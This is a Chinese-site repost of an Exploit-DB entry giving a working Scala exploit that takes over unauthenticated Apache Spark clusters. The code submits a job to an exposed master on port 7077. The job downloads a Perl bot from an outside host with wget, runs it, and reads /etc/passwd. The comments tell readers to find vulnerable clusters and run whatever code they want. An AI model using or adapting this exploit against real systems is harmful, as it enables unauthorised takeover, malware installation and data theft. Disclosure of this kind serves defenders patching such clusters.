Apache Spark Cluster 1.3.x – Arbitrary Code Execution - 体验盒子

作者： Akhil Das

日期： 2015-03-30

类别：

remote

平台：

linux

来源：https://www.exploit-db.com/exploits/36562/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

# Exploit Title: Arbitary Code Execution in Apache Spark Cluster

# Date: 23/03/2015

# Exploit Author: AkhlD (AkhilDas) <akhld@live.com> CodeBreach.in

# Vendor Homepage: https://spark.apache.org/

# Software Link: https://spark.apache.org/downloads.html

# Version: All (0.0.x, 1.1.x, 1.2.x, 1.3.x)

# Tested on: 1.2.1

# Credits: Mayur Rustagi (@mayur_rustagi), Patrick Wendel (@pwendell) for

reviewing.

# Reference(s) :

http://codebreach.in/blog/2015/03/arbitary-code-execution-in-unsecured-apache-spark-cluster/

# Exploit URL: https://github.com/akhld/spark-exploit/

# Spark clusters which are not secured with proper firewall can be taken

over easily (Since it does not have

# any authentication mechanism), this exploit simply runs arbitarty codes

over the cluster.

# All you have to do is, find a vulnerable Spark cluster (usually runs on

port 7077) add that host to your

# hosts list so that your system will recognize it (here its

spark-b-akhil-master pointing

# to 54.155.61.87 in my /etc/hosts) and submit your Spark Job with arbitary

codes that you want to execute.

# Language: Scala

import org.apache.spark.{SparkContext, SparkConf}

/**

* Created by akhld on 23/3/15.

*/

object Exploit {

def main(arg: Array[String]) {

val sconf = new SparkConf()

.setMaster("spark://spark-b-akhil-master:7077") // Set this to the

vulnerable host URI

.setAppName("Exploit")

.set("spark.cores.max", "2")

.set("spark.executor.memory", "2g")

.set("spark.driver.host","hacked.work") // Set this to your host from

where you launch the attack

val sc = new SparkContext(sconf)

sc.addJar("target/scala-2.10/spark-exploit_2.10-1.0.jar")

val exploit = sc.parallelize(1 to 1).map(x=>{

//Replace these with whatever you want to get executed

val x = "wget https://mallicioushost/mal.pl -O bot.pl".!

val y = "perl bot.pl".!

scala.io.Source.fromFile("/etc/passwd").mkString

})

exploit.collect().foreach(println)

}

Thanks

Best Regards